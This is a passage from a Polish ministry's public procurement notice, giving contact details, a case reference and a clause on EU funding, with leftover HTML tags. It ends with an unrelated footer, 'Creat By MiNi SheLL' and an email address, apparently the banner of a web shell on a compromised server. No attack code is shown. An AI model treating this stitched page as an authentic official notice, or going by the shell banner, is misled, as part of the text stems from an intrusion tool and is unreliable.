Biuro Dyrektora Generalnego
ul. Wspólna 2/4
00-926 Warszawa
faks 22-273-89-22
email: Ryszard.Baczewski@mir.gov.pl
18.W korespondencji związanej z niniejszym postępowaniem wykonawcy powinni posługiwać się znakiem postępowania: BDG-V-281-20-RB/14..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com